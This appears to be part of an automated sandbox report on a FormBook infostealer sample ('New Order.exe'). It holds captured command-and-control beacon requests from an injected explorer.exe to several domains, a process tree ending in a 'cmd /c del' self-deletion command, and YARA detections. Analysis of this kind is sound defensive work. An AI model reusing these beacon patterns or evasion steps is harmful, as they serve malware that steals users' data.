                                                                                                          Jun 22, 2021 18:06:40.022874117 CEST6990INHTTP/1.1 307 Temporary Redirect
                                                                                                          Date: Tue, 22 Jun 2021 16:06:39 GMT
                                                                                                          Server: Apache
                                                                                                          X-Powered-By: PHP/7.3.27
                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                          Pragma: no-cache
                                                                                                          Set-Cookie: sma_token_cookie=b3f0f9d0325ac9f0e1e456ac4dd5e969; expires=Tue, 22-Jun-2021 18:06:39 GMT; Max-Age=7200; path=/
                                                                                                          Set-Cookie: sess=99b68994a776bbb61303eb0074393aaf0390e97d; expires=Tue, 22-Jun-2021 18:06:39 GMT; Max-Age=7200; path=/; HttpOnly
                                                                                                          Upgrade: h2,h2c
                                                                                                          Connection: Upgrade, close
                                                                                                          Location: http://ayanmobile.com/
                                                                                                          Vary: User-Agent
                                                                                                          Content-Length: 0
                                                                                                          Content-Type: text/html; charset=UTF-8


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                          4192.168.2.44977835.209.88.3580C:\Windows\explorer.exe
                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                          Jun 22, 2021 18:06:46.522727013 CEST6991OUTGET /de52/?z6Ad_8Jp=/MwPCQmb8N4Awmw4mMKJPRGOCBQ0FmS8LiYPDqoyki9FgjxxSyxFyKWOR1kxSGqMaJan&Yz=0bpDyT HTTP/1.1
                                                                                                          Host: www.securenotifications.com
                                                                                                          Connection: close
                                                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                                                          Data Ascii:
                                                                                                          Jun 22, 2021 18:06:46.698638916 CEST6993INHTTP/1.1 404 Not Found
                                                                                                          Server: nginx
                                                                                                          Date: Tue, 22 Jun 2021 16:06:46 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: close
                                                                                                          Vary: Accept-Encoding
                                                                                                          X-Httpd: 1
                                                                                                          Host-Header: 6b7412fb82ca5edfd0917e3957f05d89
                                                                                                          X-Proxy-Cache: MISS
                                                                                                          X-Proxy-Cache-Info: 0 NC:000000 UP:
                                                                                                          Data Raw: 31 33 64 38 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 34 30 30 2c 37 30 30 25 37 43 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 20 7b 0a 20 20 20 20 20 20 20 20 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 20 20 20 20 20 20 20 20 2d 6d 6f 7a 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 20 20 20 20 20 20 20 20 2d 77 65 62 6b 69 74 2d 74 61 70 2d 68 69 67 68 6c 69 67 68 74 2d 63 6f 6c 6f 72 3a 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 0a 20 20 20 20 7d 0a 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 2d 77 65 62 6b 69 74 2d 74 65 78 74 2d 73 69 7a 65 2d 61 64 6a 75 73 74 3a 20 31 30 30 25 3b 0a 20 20 20 20 7d 0a 20 20 20 20 2e 66 69 74 2d 77 69 64 65 20 7b 0a 20 20 20 20 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 0a 20 20 20 20 20 20 20 20 6f 76 65 72 66 6c 6f 77 3a 20 68 69 64 64 65 6e 3b 0a 20 20 20 20 20 20 20 20 6d 61 78 2d 77 69 64 74 68 3a 20 31 32 34 30 70 78 3b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 2d 74 6f 70 3a 20 36 30 70 78 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 20 36 30 70 78 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 32 30 70 78 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 20 32 30 70 78 3b 0a 20 20 20 20 7d 0a 20 20 20 20 2e 62 61 63 6b 67 72 6f 75 6e 64 2d 77 72 61 70 20 7b 20 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 20 7d 0a 20 20 20 20 2e 62 61 63 6b 67 72 6f 75 6e 64 2d 77 72 61 70 2e 63 6c 6f 75 64 2d 62 6c 75 65 20 7b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 62 30 65 30 65 39 3b 20 7d 0a 20 20 20 20 2e 62 61 63 6b 67 72 6f 75 6e 64 2d 77 72 61 70 2e 77 68 69 74 65 20 7b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 20 7d 0a 20 20 20 20 2e 74 69 74 6c 65 20 7b 20 0a 20 20 20 20 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 20 0a 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 32 30
                                                                                                          Data Ascii: 13d8f<!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>404 - Not found</title> <link href="https://fonts.googleapis.com/css?family=Open+Sans:400,700%7CRoboto:400,700" rel="stylesheet"><style> * { box-sizing: border-box; -moz-box-sizing: border-box; -webkit-tap-highlight-color: transparent; } body { margin: 0; padding: 0; height: 100%; -webkit-text-size-adjust: 100%; } .fit-wide { position: relative; overflow: hidden; max-width: 1240px; margin: 0 auto; padding-top: 60px; padding-bottom: 60px; padding-left: 20px; padding-right: 20px; } .background-wrap { position: relative; } .background-wrap.cloud-blue { background-color: #b0e0e9; } .background-wrap.white { background-color: #fff; } .title { position: relative; text-align: center; margin: 20


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                          5192.168.2.44977934.102.136.18080C:\Windows\explorer.exe
                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                          Jun 22, 2021 18:06:51.837527990 CEST7018OUTGET /de52/?z6Ad_8Jp=A6XO+ITKnQQbOEvUMrF2CVYLPv45kLd/uv2YdfW9vEZfPW6611dfa85KEkC5Wqh6gBNa&Yz=0bpDyT HTTP/1.1
                                                                                                          Host: www.cuttingemporium.com
                                                                                                          Connection: close
                                                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                                                          Data Ascii:
                                                                                                          Jun 22, 2021 18:06:51.976614952 CEST7019INHTTP/1.1 403 Forbidden
                                                                                                          Server: openresty
                                                                                                          Date: Tue, 22 Jun 2021 16:06:51 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 275
                                                                                                          ETag: "60c7be46-113"
                                                                                                          Via: 1.1 google
                                                                                                          Connection: close
                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                                          Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                          6192.168.2.44978034.102.136.18080C:\Windows\explorer.exe
                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                          Jun 22, 2021 18:06:57.107094049 CEST7020OUTGET /de52/?z6Ad_8Jp=LwTVedL55OWwkv7g5+M8qNIWWWhwOSQTlz2nKf3SzAUgx635MxYM24Oa4PrOeZWczuGU&Yz=0bpDyT HTTP/1.1
                                                                                                          Host: www.optimismactivism.com
                                                                                                          Connection: close
                                                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                                                          Data Ascii:
                                                                                                          Jun 22, 2021 18:06:57.245840073 CEST7021INHTTP/1.1 403 Forbidden
                                                                                                          Server: openresty
                                                                                                          Date: Tue, 22 Jun 2021 16:06:57 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 275
                                                                                                          ETag: "60c7be36-113"
                                                                                                          Via: 1.1 google
                                                                                                          Connection: close
                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                                          Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                          7192.168.2.44978134.102.136.18080C:\Windows\explorer.exe
                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                          Jun 22, 2021 18:07:02.363946915 CEST7022OUTGET /de52/?z6Ad_8Jp=qb+cDyZ+/Kn0EiG8qAwackOr+Z8XD7HPsMVV4+H0Ra088mc2au++kj7rvX/qHs87RHMJ&Yz=0bpDyT HTTP/1.1
                                                                                                          Host: www.occasionalassistant.com
                                                                                                          Connection: close
                                                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                                                          Data Ascii:
                                                                                                          Jun 22, 2021 18:07:02.503415108 CEST7022INHTTP/1.1 403 Forbidden
                                                                                                          Server: openresty
                                                                                                          Date: Tue, 22 Jun 2021 16:07:02 GMT
                                                                                                          Content-Type: text/html
                                                                                                          Content-Length: 275
                                                                                                          ETag: "60c7be6a-113"
                                                                                                          Via: 1.1 google
                                                                                                          Connection: close
                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                                          Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                                                          Code Manipulations

                                                                                                          Statistics

                                                                                                          Behavior

                                                                                                          Click to jump to process

                                                                                                          System Behavior

                                                                                                          Analysis Process: New Order.exe PID: 7044 Parent PID: 6124

                                                                                                          General

                                                                                                          Start time:18:04:57
                                                                                                          Start date:22/06/2021
                                                                                                          Path:C:\Users\user\Desktop\New Order.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:'C:\Users\user\Desktop\New Order.exe'
                                                                                                          Imagebase:0x400000
                                                                                                          File size:206093 bytes
                                                                                                          MD5 hash:4AF03301316C984C17CA822456B6D918
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Yara matches:
                                                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.645023716.00000000022A0000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.645023716.00000000022A0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.645023716.00000000022A0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                          Reputation:low

                                                                                                          Analysis Process: New Order.exe PID: 7108 Parent PID: 7044

                                                                                                          General

                                                                                                          Start time:18:04:58
                                                                                                          Start date:22/06/2021
                                                                                                          Path:C:\Users\user\Desktop\New Order.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:'C:\Users\user\Desktop\New Order.exe'
                                                                                                          Imagebase:0x400000
                                                                                                          File size:206093 bytes
                                                                                                          MD5 hash:4AF03301316C984C17CA822456B6D918
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Yara matches:
                                                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.690404186.00000000009F0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.690404186.00000000009F0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.690404186.00000000009F0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.690073712.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.690073712.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.690073712.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000001.642981900.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000001.642981900.0000000000400000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000001.642981900.0000000000400000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.690378991.00000000009C0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.690378991.00000000009C0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.690378991.00000000009C0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                          Reputation:low

                                                                                                          Analysis Process: explorer.exe PID: 3424 Parent PID: 7108

                                                                                                          General

                                                                                                          Start time:18:05:03
                                                                                                          Start date:22/06/2021
                                                                                                          Path:C:\Windows\explorer.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\Explorer.EXE
                                                                                                          Imagebase:0x7ff6fee60000
                                                                                                          File size:3933184 bytes
                                                                                                          MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Reputation:high

                                                                                                          Analysis Process: wscript.exe PID: 5884 Parent PID: 3424

                                                                                                          General

                                                                                                          Start time:18:05:20
                                                                                                          Start date:22/06/2021
                                                                                                          Path:C:\Windows\SysWOW64\wscript.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:C:\Windows\SysWOW64\wscript.exe
                                                                                                          Imagebase:0xdf0000
                                                                                                          File size:147456 bytes
                                                                                                          MD5 hash:7075DD7B9BE8807FCA93ACD86F724884
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Yara matches:
                                                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.901125001.0000000000EB0000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.901125001.0000000000EB0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.901125001.0000000000EB0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.901427699.0000000003380000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.901427699.0000000003380000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.901427699.0000000003380000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                          Reputation:high

                                                                                                          Analysis Process: cmd.exe PID: 6416 Parent PID: 5884

                                                                                                          General

                                                                                                          Start time:18:05:24
                                                                                                          Start date:22/06/2021
                                                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:/c del 'C:\Users\user\Desktop\New Order.exe'
                                                                                                          Imagebase:0x11d0000
                                                                                                          File size:232960 bytes
                                                                                                          MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Reputation:high

                                                                                                          Analysis Process: conhost.exe PID: 6508 Parent PID: 6416

                                                                                                          General

                                                                                                          Start time:18:05:24
                                                                                                          Start date:22/06/2021
                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                          Imagebase:0x7ff724c50000
                                                                                                          File size:625664 bytes
                                                                                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Reputation:high

                                                                                                          Disassembly

                                                                                                          Code Analysis

                                                                                                          Reset < >